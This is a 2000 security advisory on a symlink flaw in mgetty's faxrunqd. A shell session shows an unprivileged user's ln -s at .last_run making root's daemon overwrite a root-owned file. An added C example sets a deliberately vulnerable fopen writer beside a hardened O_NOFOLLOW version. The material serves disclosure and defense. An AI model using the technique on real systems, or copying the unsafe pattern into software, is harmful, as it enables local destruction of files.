Title: mgetty local compromise
Released by: Stan Bubrouski
Date: 26th August 2000
Author            : Stan Bubrouski
Date              : August 26, 2000
Package           : mgetty
Versions affected : 1.1.22, 1.1.21 and prior (at least back to 1994)
Severity          : faxrunqd follows symbolic links when creating certain
                    files. The default location for those files is
                    /var/spool/fax/outgoing, a world-writable directory.
                    Because faxrunqd is usually run by root, any local user
                    can destroy the contents of any file on any mounted
                    filesystem.
Problem           : mgetty ships with faxrunqd, a daemon that sends the fax
                    jobs queued by faxspool(1). On each successful run it
                    creates a file named .last_run in the world-writable
                    /var/spool/fax/outgoing/ directory. faxrunqd opens that
                    file without checking whether a symlink already sits at
                    that name, so a symlink planted by any user is followed:
                    files can be created anywhere on the system, and an
                    existing file is truncated and overwritten with
                    faxrunqd's timestamp line. The sticky bit on the spool
                    directory does not help; it only stops users removing
                    each other's files, not planting a symlink of their own.

Example:

Remote unprivileged user:

[user@king /tmp]$ id
uid=200(user) gid=100(users) groups=100(users)
[user@king /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt    3 root     root         1024 Jun  2 18:46 .
drwxr-xr-x    4 root     root         1024 Jun  2 18:46 ..
drwxrwxrwx    2 root     root         1024 Jun  1 00:47 locks
[user@king /tmp]$ ls -al /etc/smash_me
-rw-r--r--    1 root     root           12 Jun  2 18:45 /etc/smash_me
[user@king /tmp]$ cat /etc/smash_me
Smash me!!!
[user@king /tmp]$ ln -s /etc/smash_me /var/spool/fax/outgoing/.last_run
[user@king /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt    3 root     root         1024 Jun  2 18:48 .
drwxr-xr-x    4 root     root         1024 Jun  2 18:46 ..
lrwxrwxrwx    1 user     users          13 Jun  2 18:48 .last_run -> /etc/smash_me
drwxrwxrwx    2 root     root         1024 Jun  1 00:47 locks

Root console:

[root@king /tmp]# faxrunqd -l ttyS0
...

Remote unprivileged user:

[user@king /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt    3 root     root         1024 Jun  2 18:48 .
drwxr-xr-x    4 root     root         1024 Jun  2 18:48 ..
lrwxrwxrwx    1 user     users          13 Jun  2 18:48 .last_run -> /etc/smash_me
drwxrwxrwx    2 root     root         1024 Jun  1 00:47 locks
[user@king /tmp]$ ls -al /etc/smash_me
-rw-r--r--    1 root     root           44 Jun  2 18:48 /etc/smash_me
[user@king /tmp]$ cat /etc/smash_me
Fri Jun  2 18:48:47 2000 /usr/sbin/faxrunqd
[user@king /tmp]$

The 12-byte root-owned file has been truncated and now holds only the
44-byte timestamp line faxrunqd writes to .last_run.
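Added example, not code from the advisory or from mgetty: a C program that puts the file-creation pattern behind the Severity and Problem sections (fopen(path, "w") on a name in a world-writable directory) next to a hardened writer that opens with O_NOFOLLOW and checks the opened descriptor before truncating. The function names are my own, and the scaffolding stands in for the real paths: a temporary directory under /tmp plays /var/spool/fax/outgoing, a constructed smash_me file plays /etc/smash_me, and "/usr/sbin/faxrunqd" is just the string written into the file. Each demo_* function returns 1 when the scenario behaves as described.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <time.h>
#include <unistd.h>

/* Vulnerable pattern (illustrative, not mgetty's code): fopen(path, "w") is
 * open(O_WRONLY|O_CREAT|O_TRUNC), so a symlink at spool_dir/.last_run is followed. */
static int record_last_run_unsafe(const char *spool_dir, const char *argv0)
{
    char path[PATH_MAX];
    time_t now = time(NULL);
    snprintf(path, sizeof path, "%s/.last_run", spool_dir);
    FILE *fp = fopen(path, "w");
    if (fp == NULL)
        return -1;
    fprintf(fp, "%.24s %s\n", ctime(&now), argv0); /* the line seen in the advisory */
    return fclose(fp);
}

/* Hardened writer: O_NOFOLLOW makes open() fail with ELOOP on a symlink,
 * O_NONBLOCK keeps a planted FIFO from hanging the daemon, and type, owner and
 * link count are checked on the open fd, so nothing can be swapped in between. */
static int record_last_run_safe(const char *spool_dir, const char *argv0)
{
    char path[PATH_MAX];
    struct stat st;
    time_t now = time(NULL);
    snprintf(path, sizeof path, "%s/.last_run", spool_dir);
    int fd = open(path, O_WRONLY | O_CREAT | O_NOFOLLOW | O_NOCTTY | O_NONBLOCK, 0644);
    if (fd < 0)
        return -1;                      /* errno == ELOOP when a symlink was planted */
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != geteuid() || st.st_nlink != 1) {
        close(fd);                      /* another user's file, or a hard link */
        errno = EPERM;
        return -1;
    }
    if (ftruncate(fd, 0) < 0 || dprintf(fd, "%.24s %s\n", ctime(&now), argv0) < 0) {
        close(fd);
        return -1;
    }
    return close(fd);
}

/* Demo scaffolding (constructed): throwaway spool dir, victim file, and the
 * attacker's symlink .last_run -> victim, like the advisory's ln -s. */
static int make_attack_dir(char *dir, char *victim, char *link)
{
    strcpy(dir, "/tmp/faxdemo.XXXXXX");
    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(victim, PATH_MAX, "%s/smash_me", dir);
    snprintf(link, PATH_MAX, "%s/.last_run", dir);
    FILE *fp = fopen(victim, "w");
    if (fp == NULL || fputs("Smash me!!!\n", fp) == EOF || fclose(fp) != 0)
        return -1;
    return symlink(victim, link);
}

static int victim_intact(const char *victim)
{
    char buf[64] = {0};
    FILE *fp = fopen(victim, "r");
    if (fp != NULL) { (void)fread(buf, 1, sizeof buf - 1, fp); fclose(fp); }
    return strcmp(buf, "Smash me!!!\n") == 0;   /* still the original 12 bytes? */
}

/* 1 if the unsafe writer clobbered the victim through the symlink. */
int demo_unsafe_follows_symlink(void)
{
    char dir[PATH_MAX], victim[PATH_MAX], link[PATH_MAX];
    if (make_attack_dir(dir, victim, link) < 0) return -1;
    return record_last_run_unsafe(dir, "/usr/sbin/faxrunqd") == 0 && !victim_intact(victim);
}

/* 1 if the hardened writer refused with ELOOP and left the victim untouched. */
int demo_safe_refuses_symlink(void)
{
    char dir[PATH_MAX], victim[PATH_MAX], link[PATH_MAX];
    if (make_attack_dir(dir, victim, link) < 0) return -1;
    int rc = record_last_run_safe(dir, "/usr/sbin/faxrunqd");
    return rc == -1 && errno == ELOOP && victim_intact(victim);
}

/* 1 if, with no symlink present, the hardened writer creates a regular
 * .last_run holding the 44-byte line (24-char ctime + space + path + newline). */
int demo_safe_normal_case(void)
{
    char dir[PATH_MAX], victim[PATH_MAX], link[PATH_MAX];
    struct stat st;
    if (make_attack_dir(dir, victim, link) < 0 || unlink(link) < 0) return -1;
    if (record_last_run_safe(dir, "/usr/sbin/faxrunqd") != 0) return 0;
    return lstat(link, &st) == 0 && S_ISREG(st.st_mode) && st.st_size == 44;
}
```

The hardened open is a stopgap for the daemon, not the whole fix: a user who can write to the directory can still pre-create a regular .last_run of their own and make the writer refuse (a denial of service rather than file destruction), so the spool directory itself should not be writable by arbitrary users. The demo builds its directory with mode 0700 and a symlink owned by the caller, so the Linux fs.protected_symlinks restriction on symlinks in sticky world-writable directories does not interfere with it; on a real /var/spool/fax/outgoing that sysctl would block this particular attack on kernels that have it, but it is no substitute for fixing the open.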



Believed to be vulnerable:

Red Hat Linux 6.2 and all prior versions              (Vulnerable)
Linux-Mandrake 7.1 and all prior versions             (Vulnerable)
Conectiva Linux 4.2, 5.0, and 5.1                     (Untested)
LinuxPPC 1999 and 2000                                (Untested)
TurboLinux 4.0, 6.0                                   (Untested)
Debian 2.2 (potato), 2.1 (slink)                      (Untested)
Yellow Dog Linux Champion Server 1.0, 1.1, 1.2        (Untested)
MkLinux Pre Release 1 (R1)                            (Untested)
Caldera OpenLinux 2.2, 2.3, 2.4                       (Untested)
Think Blue Linux 1.0 (Linux for the S/390)            (Untested)
OpenBSD 2.7? (mgetty is included in ports packages)
NetBSD 1.4.2?
FreeBSD?
Probably others...

Believed to be unaffected:

SuSE - all versions
Slackware - all versions







